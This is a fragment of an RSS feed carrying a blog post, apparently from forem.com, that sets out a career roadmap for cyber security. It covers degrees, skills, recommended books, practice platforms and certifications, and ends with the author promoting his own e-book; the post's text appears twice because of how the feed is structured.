&lt;p&gt;The course will also familiarise you with multiple computer languages such as JAVA etc. and the latest cyber security trends. A bachelor's degree in a related field can also help you land an entry-level job in cyber security. For example, you can get a job as a cyber security analyst in an organisation that does not require you to have any experience.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2: Acquire Relevant Technical and Soft Skills&lt;/strong&gt;&lt;br&gt;
Certain technical skills are a prerequisite for becoming successful and sought-after cyber security experts. Therefore, you must acquire these technical skills and be good at them.&lt;/p&gt;

&lt;p&gt;First of all, you must be good at coding. Get a working knowledge of programming languages such as JAVA, Python, C++ and other cutting-edge technologies. Hands-on experience using tools like PowerShell and OpenSSH is desirable.&lt;/p&gt;

&lt;p&gt;This will enable you to design security solutions, task automation, etc. in the field. It helps to have a thorough understanding of cyber security related concepts. Here are a few of them:&lt;/p&gt;

&lt;p&gt;Security Incident Handling and Response: A cybersecurity professional should be able to address any possible danger of an existing breach of an organisation's security guidelines or standard cybersecurity procedures. Such security breaches can include malware, Distributed Denial of Service (DDoS) attacks, etc.&lt;/p&gt;

&lt;p&gt;SIEM Management: As a cybersecurity professional, you should be able to manage security information and event management (SIEM) services and tools. You will also need to produce automation using SIEM tools to understand the real-time assessment delivered through alerts and translate them into incident-response plans.&lt;/p&gt;

&lt;p&gt;Audit and Compliance: A cybersecurity professional needs to comprehensively re-evaluate the organisation's compliance with regulatory policies, including HIPAA, PCI DSS, COBIT, ISO 27001 and 20000. missed scopes that can lead to critical penalties and liabilities for the organisation.&lt;/p&gt;

&lt;p&gt;Analytics and Intelligence: A security professional must leverage analytics and gather intelligence to quickly recognise and catch attacks. In addition, using analytics and collected intelligence enables the expert to bring networks and applications together with data to stop attacks.&lt;/p&gt;

&lt;p&gt;Firewall/IDS/IPS Skills: A cybersecurity professional should use the power of a firewall to scan network traffic to avoid unauthorised entries into the network. Therefore, the cybersecurity professional must have a thorough knowledge of Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) and understand their relationship to the firewall. Intrusion Detection: To be a successful security professional, you must be able to use IDS to detect suspicious traffic and security policy violations. All this technical knowledge and expertise will help you succeed as a cyber security expert. You can acquire the necessary skills and knowledge related to the previously mentioned concepts by enrolling in advanced training sessions, online tutorials, workshops, webinars, and other resources such as books.&lt;/p&gt;

&lt;p&gt;Certain technical skills are a prerequisite to becoming successful and sought-after cybersecurity professionals. Therefore, you should acquire these technical skills and be good at them. You can start by enrolling in a certified ethical hacker course.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Read Books to Upgrade Your Knowledge&lt;/strong&gt;&lt;br&gt;
You can also read the following books to improve your domain knowledge:&lt;/p&gt;

&lt;p&gt;Cyber Security for Dummies: This book will help you understand the basics of cyber security including various cyber security dangers, ethical hacking, etc. Cyber Security for Beginners : It is a bible for those with a non-technical background. The authors have used non-technical English and simple terms to explain cyber security concepts. Computer Hacking: A Beginner's Guide: This book contains comprehensive information about hacking, such as types of hacking, ethical hacking, etc. Practical Malware Analysis: It is a detailed guide to all types of malware and allows you to understand the debugging of malware programmes. Cyber security from scratch to the top:&lt;/p&gt;

&lt;p&gt;"The special Cyber Security e-book for enthusiasts is designed for those who want to discover ways to stay safe in the internet world. In this book, you will learn how cyber attacks are carried out and how you can take precautions against these attacks. This e-book also explains in detail how you can protect your personal information and devices, and provides all the information you need for a safe online experience. With the Cyber Security E-book, you will feel safe in the internet world and be prepared against cyber threats."&lt;/p&gt;

&lt;p&gt;What you will learn Basic cyber security concepts and terminology Defining types of attacks and cyber threats Identifying vulnerabilities and how they can be exploited Data security and privacy issues Secure network design and management Cyber security tools and technologies Authentication and authorisation systems Social engineering attacks and how to protect against them and more....&lt;/p&gt;

&lt;p&gt;Just like any other field, cyber security is a field that requires you to constantly improve yourself and learn the latest techniques and trends. Therefore, while it is essential to have technical skills, it is also necessary to develop soft skills that will help you excel in the field. Some of them are communication skills, time management, problem solving, teamwork, etc.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4: Gain Practical Experience&lt;/strong&gt;&lt;br&gt;
Once you have the relevant degree, the necessary technical skills and subject matter expertise, it is time to gain hands-on experience in this field. First, look for internships or training programmes where you can work on live projects in a real-time installation.&lt;/p&gt;

&lt;p&gt;Alternatively, you can also apply for entry-level jobs in the field. Positions such as cyber security analyst and network analyst can offer you great exposure. It will help you better understand the basic workings of cybersecurity and prepare you for a higher position in a more prominent company.&lt;/p&gt;

&lt;p&gt;Gaining industry experience will be beneficial to better understand which job profile interests you the most. But, again, networking is an excellent place to start. You can virtually search for networking groups or any event or job fairs or networks in the domain.&lt;/p&gt;

&lt;p&gt;Connect with professionals from similar fields on LinkedIn and look for internship or part-time work opportunities. Firstly, work on your CV and highlight relevant projects you have worked on. Then, find suitable options and start climbing the ladder.&lt;/p&gt;

&lt;p&gt;More important organisations often look for professionals with relevant and hands-on experience in the field.&lt;/p&gt;

&lt;p&gt;platforms and sites where we will improve ourselves in cyber security&lt;br&gt;
Cyber security is an increasingly important field in today's world. As the number and complexity of cyber attacks increase, the need for cyber security experts is also increasing.&lt;/p&gt;

&lt;p&gt;There are many platforms and sites that you can use to improve yourself in the field of cyber security. These platforms and sites offer content suitable for all levels, from learning cyber security basics to advanced techniques.&lt;/p&gt;

&lt;p&gt;Here are some platforms and sites you can use to improve yourself in cyber security:&lt;/p&gt;

&lt;p&gt;Hack The Box: Hack The Box is one of the most popular platforms to improve yourself in cyber security. The platform offers a series of challenges that simulate real-world cyberattacks through virtual machines.&lt;/p&gt;

&lt;p&gt;TryHackMe: TryHackMe is a platform similar to Hack The Box. The platform offers challenges for all levels, from cybersecurity basics to advanced techniques.&lt;/p&gt;

&lt;p&gt;PwnAdventure: PwnAdventure is a game designed to learn the basics of cyber security. The game allows users to learn the skills needed to hack a virtual machine.&lt;/p&gt;

&lt;p&gt;Cybrary: Cybrary is a vast source of information about cyber security. The platform offers videos, articles, courses and other materials.&lt;/p&gt;

&lt;p&gt;SANS Institute: SANS Institute is an educational institution specialising in cybersecurity. It offers various courses and certification programmes in cybersecurity.&lt;/p&gt;

&lt;p&gt;Apart from these platforms and sites, there are many other resources that you can use to improve yourself in the field of cyber security. For example, you can follow cyber security blogs and websites, read cyber security books, and attend cyber security events.&lt;/p&gt;

&lt;p&gt;You can follow the steps below to improve yourself in the field of cyber security:&lt;/p&gt;

&lt;p&gt;Learn the basics of cyber security. Gaining a basic understanding of cybersecurity is important to move on to more advanced topics. Practise. Cyber security skills improve with practice. Platforms such as Hack The Box, TryHackMe and PwnAdventure are a great way to develop cyber security skills. Follow the latest trends in cyber security. The field of cyber security is evolving rapidly. By following the latest trends in cyber security, you can keep your knowledge up to date. Join a community in cyber security. Joining a cyber security community is a great way to connect and share knowledge with other cyber security experts. By investing time and effort into developing yourself in cybersecurity, you can increase your chances of succeeding in your career in this field.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 5: Get Relevant Certifications Cyber security&lt;/strong&gt;&lt;br&gt;
is one of the most critical aspects of the career path. Therefore, securing relevant certificates helps. Now, let's address the most obvious question first: Why do you need these certifications if you already have an appropriate degree and the necessary skills? These certifications are often prerequisites and are included in many organisations' basic criteria for various cybersecurity jobs.&lt;/p&gt;

&lt;p&gt;In addition, these certifications are a way to examine and validate your skills and knowledge of the field. Some of the most sought-after certifications include:&lt;/p&gt;

&lt;p&gt;Certified Ethical Hacker (CEH) Certified Information Systems Security Professional (CISSP) Cisco Certified Network Professional (CCNP) Security Global Information Assurance Certification (GIAC) Certification Always obtain these certificates from recognised and authorised organisations. It will ensure that they are recognised and accepted by all companies.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 6: Apply for Cyber Security Jobs&lt;/strong&gt;&lt;br&gt;
The final step is to apply for cybersecurity jobs that align with your experience, skills and future career goals. With the required degree, skills, knowledge and certifications, you are eligible to apply for jobs in most tech giants.&lt;/p&gt;

&lt;p&gt;You can apply for jobs through LinkedIn or other job search platforms such as Naukri, TimesJob, etc. To apply for a job, prepare an attractive cover letter and an impressive CV. You should also be prepared for personal interviews and information assessment rounds to find the highest paying job in a leading company.&lt;/p&gt;

&lt;p&gt;by the way, the above &lt;code&gt;[cyber security book from]&lt;/code&gt;(&lt;a href="https://www.shopier.com/ShowProductNew/products.php?id=17107458"&gt;https://www.shopier.com/ShowProductNew/products.php?id=17107458&lt;/a&gt;) zero to the top is my work and is now on sale with a very special campaign thank you ederim❤️❤&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>siber</category>
      <category>developers</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Complete Roadmap for Cyber Security Career Path</title>
      <dc:creator>Ferdi Birgül </dc:creator>
      <pubDate>Fri, 08 Dec 2023 15:56:23 +0000</pubDate>
      <link>https://forem.com/ferdibrgl/complete-roadmap-for-cyber-security-career-path-554m</link>
      <guid>https://forem.com/ferdibrgl/complete-roadmap-for-cyber-security-career-path-554m</guid>
      <description>&lt;p&gt;Below are some basic requirements and steps to become a cyber security expert:&lt;/p&gt;

&lt;p&gt;*&lt;em&gt;**Step 1: Education Requirements&lt;/em&gt;*&lt;br&gt;
**&lt;br&gt;
Firstly, you must fulfil the basic educational requirement to pursue your career in cyber security. You should have a bachelor's degree in computer science, information technology or a similar field with an emphasis on cyber security.&lt;/p&gt;

&lt;p&gt;Obtaining a bachelor's degree in the mentioned fields can help you gain basic knowledge about firewalls, computer networks, cyber security measures, cryptography and coding. To be successful in this field it is essential to be proficient in programming languages.&lt;/p&gt;

&lt;p&gt;The course will also familiarise you with multiple computer languages such as JAVA etc. and the latest cyber security trends. A bachelor's degree in a related field can also help you land an entry-level job in cyber security. For example, you can get a job as a cyber security analyst in an organisation that does not require you to have any experience.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2: Acquire Relevant Technical and Soft Skills&lt;/strong&gt;&lt;br&gt;
Certain technical skills are a prerequisite for becoming successful and sought-after cyber security experts. Therefore, you must acquire these technical skills and be good at them.&lt;/p&gt;

&lt;p&gt;First of all, you must be good at coding. Get a working knowledge of programming languages such as JAVA, Python, C++ and other cutting-edge technologies. Hands-on experience using tools like PowerShell and OpenSSH is desirable.&lt;/p&gt;

&lt;p&gt;This will enable you to design security solutions, task automation, etc. in the field. It helps to have a thorough understanding of cyber security related concepts. Here are a few of them:&lt;/p&gt;

&lt;p&gt;Security Incident Handling and Response: A cybersecurity professional should be able to address any possible danger of an existing breach of an organisation's security guidelines or standard cybersecurity procedures. Such security breaches can include malware, Distributed Denial of Service (DDoS) attacks, etc.&lt;/p&gt;

&lt;p&gt;SIEM Management: As a cybersecurity professional, you should be able to manage security information and event management (SIEM) services and tools. You will also need to produce automation using SIEM tools to understand the real-time assessment delivered through alerts and translate them into incident-response plans.&lt;/p&gt;

&lt;p&gt;Audit and Compliance: A cybersecurity professional needs to comprehensively re-evaluate the organisation's compliance with regulatory policies, including HIPAA, PCI DSS, COBIT, ISO 27001 and 20000. missed scopes that can lead to critical penalties and liabilities for the organisation.&lt;/p&gt;

&lt;p&gt;Analytics and Intelligence: A security professional must leverage analytics and gather intelligence to quickly recognise and catch attacks. In addition, using analytics and collected intelligence enables the expert to bring networks and applications together with data to stop attacks.&lt;/p&gt;

&lt;p&gt;Firewall/IDS/IPS Skills: A cybersecurity professional should use the power of a firewall to scan network traffic to avoid unauthorised entries into the network. Therefore, the cybersecurity professional must have a thorough knowledge of Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) and understand their relationship to the firewall. Intrusion Detection: To be a successful security professional, you must be able to use IDS to detect suspicious traffic and security policy violations. All this technical knowledge and expertise will help you succeed as a cyber security expert. You can acquire the necessary skills and knowledge related to the previously mentioned concepts by enrolling in advanced training sessions, online tutorials, workshops, webinars, and other resources such as books.&lt;/p&gt;

&lt;p&gt;Certain technical skills are a prerequisite to becoming successful and sought-after cybersecurity professionals. Therefore, you should acquire these technical skills and be good at them. You can start by enrolling in a certified ethical hacker course.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Read Books to Upgrade Your Knowledge&lt;/strong&gt;&lt;br&gt;
You can also read the following books to improve your domain knowledge:&lt;/p&gt;

&lt;p&gt;Cyber Security for Dummies: This book will help you understand the basics of cyber security including various cyber security dangers, ethical hacking, etc. Cyber Security for Beginners : It is a bible for those with a non-technical background. The authors have used non-technical English and simple terms to explain cyber security concepts. Computer Hacking: A Beginner's Guide: This book contains comprehensive information about hacking, such as types of hacking, ethical hacking, etc. Practical Malware Analysis: It is a detailed guide to all types of malware and allows you to understand the debugging of malware programmes. Cyber security from scratch to the top:&lt;/p&gt;

&lt;p&gt;"The special Cyber Security e-book for enthusiasts is designed for those who want to discover ways to stay safe in the internet world. In this book, you will learn how cyber attacks are carried out and how you can take precautions against these attacks. This e-book also explains in detail how you can protect your personal information and devices, and provides all the information you need for a safe online experience. With the Cyber Security E-book, you will feel safe in the internet world and be prepared against cyber threats."&lt;/p&gt;

&lt;p&gt;What you will learn Basic cyber security concepts and terminology Defining types of attacks and cyber threats Identifying vulnerabilities and how they can be exploited Data security and privacy issues Secure network design and management Cyber security tools and technologies Authentication and authorisation systems Social engineering attacks and how to protect against them and more....&lt;/p&gt;

&lt;p&gt;Just like any other field, cyber security is a field that requires you to constantly improve yourself and learn the latest techniques and trends. Therefore, while it is essential to have technical skills, it is also necessary to develop soft skills that will help you excel in the field. Some of them are communication skills, time management, problem solving, teamwork, etc.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4: Gain Practical Experience&lt;/strong&gt;&lt;br&gt;
Once you have the relevant degree, the necessary technical skills and subject matter expertise, it is time to gain hands-on experience in this field. First, look for internships or training programmes where you can work on live projects in a real-time installation.&lt;/p&gt;

&lt;p&gt;Alternatively, you can also apply for entry-level jobs in the field. Positions such as cyber security analyst and network analyst can offer you great exposure. It will help you better understand the basic workings of cybersecurity and prepare you for a higher position in a more prominent company.&lt;/p&gt;

&lt;p&gt;Gaining industry experience will be beneficial to better understand which job profile interests you the most. But, again, networking is an excellent place to start. You can virtually search for networking groups or any event or job fairs or networks in the domain.&lt;/p&gt;

&lt;p&gt;Connect with professionals from similar fields on LinkedIn and look for internship or part-time work opportunities. Firstly, work on your CV and highlight relevant projects you have worked on. Then, find suitable options and start climbing the ladder.&lt;/p&gt;

&lt;p&gt;More important organisations often look for professionals with relevant and hands-on experience in the field.&lt;/p&gt;

&lt;p&gt;platforms and sites where we will improve ourselves in cyber security&lt;br&gt;
Cyber security is an increasingly important field in today's world. As the number and complexity of cyber attacks increase, the need for cyber security experts is also increasing.&lt;/p&gt;

&lt;p&gt;There are many platforms and sites that you can use to improve yourself in the field of cyber security. These platforms and sites offer content suitable for all levels, from learning cyber security basics to advanced techniques.&lt;/p&gt;

&lt;p&gt;Here are some platforms and sites you can use to improve yourself in cyber security:&lt;/p&gt;

&lt;p&gt;Hack The Box: Hack The Box is one of the most popular platforms to improve yourself in cyber security. The platform offers a series of challenges that simulate real-world cyberattacks through virtual machines.&lt;/p&gt;

&lt;p&gt;TryHackMe: TryHackMe is a platform similar to Hack The Box. The platform offers challenges for all levels, from cybersecurity basics to advanced techniques.&lt;/p&gt;

&lt;p&gt;PwnAdventure: PwnAdventure is a game designed to learn the basics of cyber security. The game allows users to learn the skills needed to hack a virtual machine.&lt;/p&gt;

&lt;p&gt;Cybrary: Cybrary is a vast source of information about cyber security. The platform offers videos, articles, courses and other materials.&lt;/p&gt;

&lt;p&gt;SANS Institute: SANS Institute is an educational institution specialising in cybersecurity. It offers various courses and certification programmes in cybersecurity.&lt;/p&gt;

&lt;p&gt;Apart from these platforms and sites, there are many other resources that you can use to improve yourself in the field of cyber security. For example, you can follow cyber security blogs and websites, read cyber security books, and attend cyber security events.&lt;/p&gt;

&lt;p&gt;You can follow the steps below to improve yourself in the field of cyber security:&lt;/p&gt;

&lt;p&gt;Learn the basics of cyber security. Gaining a basic understanding of cybersecurity is important to move on to more advanced topics. Practise. Cyber security skills improve with practice. Platforms such as Hack The Box, TryHackMe and PwnAdventure are a great way to develop cyber security skills. Follow the latest trends in cyber security. The field of cyber security is evolving rapidly. By following the latest trends in cyber security, you can keep your knowledge up to date. Join a community in cyber security. Joining a cyber security community is a great way to connect and share knowledge with other cyber security experts. By investing time and effort into developing yourself in cybersecurity, you can increase your chances of succeeding in your career in this field.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 5: Get Relevant Certifications Cyber security&lt;/strong&gt;&lt;br&gt;
is one of the most critical aspects of the career path. Therefore, securing relevant certificates helps. Now, let's address the most obvious question first: Why do you need these certifications if you already have an appropriate degree and the necessary skills? These certifications are often prerequisites and are included in many organisations' basic criteria for various cybersecurity jobs.&lt;/p&gt;

&lt;p&gt;In addition, these certifications are a way to examine and validate your skills and knowledge of the field. Some of the most sought-after certifications include:&lt;/p&gt;

&lt;p&gt;Certified Ethical Hacker (CEH) Certified Information Systems Security Professional (CISSP) Cisco Certified Network Professional (CCNP) Security Global Information Assurance Certification (GIAC) Certification Always obtain these certificates from recognised and authorised organisations. It will ensure that they are recognised and accepted by all companies.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 6: Apply for Cyber Security Jobs&lt;/strong&gt;&lt;br&gt;
The final step is to apply for cybersecurity jobs that align with your experience, skills and future career goals. With the required degree, skills, knowledge and certifications, you are eligible to apply for jobs in most tech giants.&lt;/p&gt;

&lt;p&gt;You can apply for jobs through LinkedIn or other job search platforms such as Naukri, TimesJob, etc. To apply for a job, prepare an attractive cover letter and an impressive CV. You should also be prepared for personal interviews and information assessment rounds to find the highest paying job in a leading company.&lt;/p&gt;

&lt;p&gt;by the way, the above &lt;code&gt;[cyber security book from]&lt;/code&gt;(&lt;a href="https://www.shopier.com/ShowProductNew/products.php?id=17107458"&gt;https://www.shopier.com/ShowProductNew/products.php?id=17107458&lt;/a&gt;) zero to the top is my work and is now on sale with a very special campaign thank you ederim❤️❤&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>siber</category>
      <category>developers</category>
      <category>webdev</category>
    </item>
  </channel>
</rss>
